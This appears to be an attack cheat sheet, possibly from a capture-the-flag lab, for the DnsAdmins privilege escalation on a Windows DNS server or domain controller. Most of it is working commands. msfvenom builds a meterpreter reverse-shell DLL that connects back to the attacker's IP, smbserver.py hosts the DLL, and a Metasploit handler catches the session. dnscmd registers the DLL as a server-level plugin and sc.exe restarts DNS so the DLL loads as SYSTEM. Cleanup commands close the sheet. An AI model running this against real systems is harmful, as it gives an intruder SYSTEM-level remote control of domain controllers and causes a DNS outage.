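# DnsAdmins privilege escalation
#
# If you control an account that is a member of the "DnsAdmins" group you can
# use it to escalate privileges on the DNS server (typically a domain controller).
# It works by pointing the DNS service at a malicious "server level plugin" DLL;
# the DLL is loaded by dns.exe, which runs as SYSTEM, the next time the service
# starts. You therefore also need to be able to stop/start the DNS service
# (verify with `sc.exe sdshow dns` -- DnsAdmins membership alone may not grant it).
#
# Caveats:
# - The DLL must match the architecture of dns.exe (x64 on modern servers).
# - The DNS service is unavailable between the stop and the start below; on a
#   production DC this is a visible outage.
# - Clean up afterwards (see the end), otherwise the service keeps trying to load
#   the DLL from a share that no longer exists on every subsequent restart.

# Generate the DLL (no root needed for msfvenom).
$ msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.28 LPORT=5566 -f dll > privesc.dll

# Host the DLL on an SMB share, or upload it to the target machine.
# dns.exe fetches the DLL as the DNS server's machine account, so the share must
# be readable without credentials (smbserver.py serves it unauthenticated by default).
# The share name used here (MYSHARE) must match the UNC path given to dnscmd below.
$ sudo smbserver.py MYSHARE /path/to/dll -smb2support

# Start a handler for the payload BEFORE restarting the service.
$ msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.28; set LPORT 5566; run"

# Point the DNS server (10.10.10.169) at the DLL. dnscmd can be run from any
# domain-joined host that has it installed, as the DnsAdmins user.
PS > dnscmd 10.10.10.169 /config /serverlevelplugindll \\10.10.14.28\MYSHARE\privesc.dll

# Confirm the path was written. Note: this only shows the configured value on the
# DNS server; it does not prove the DLL has been loaded yet (that happens on start).
PS > Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

# Restart the DNS service so the DLL gets loaded as SYSTEM.
# Make sure `query` reports STOPPED before issuing `start`.
PS > sc.exe stop dns
PS > sc.exe query dns
PS > sc.exe start dns

# If the exploit worked you should get a meterpreter session on the handler.

# Cleanup: clear the plugin DLL so the DNS service starts normally on the next
# restart (an unreachable plugin path can leave the DNS service unable to start).
# Either clear it via dnscmd (no path argument) or delete the registry value,
# then restart the service once more.
PS > dnscmd 10.10.10.169 /config /serverlevelplugindll
PS > Remove-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll -ErrorAction SilentlyContinue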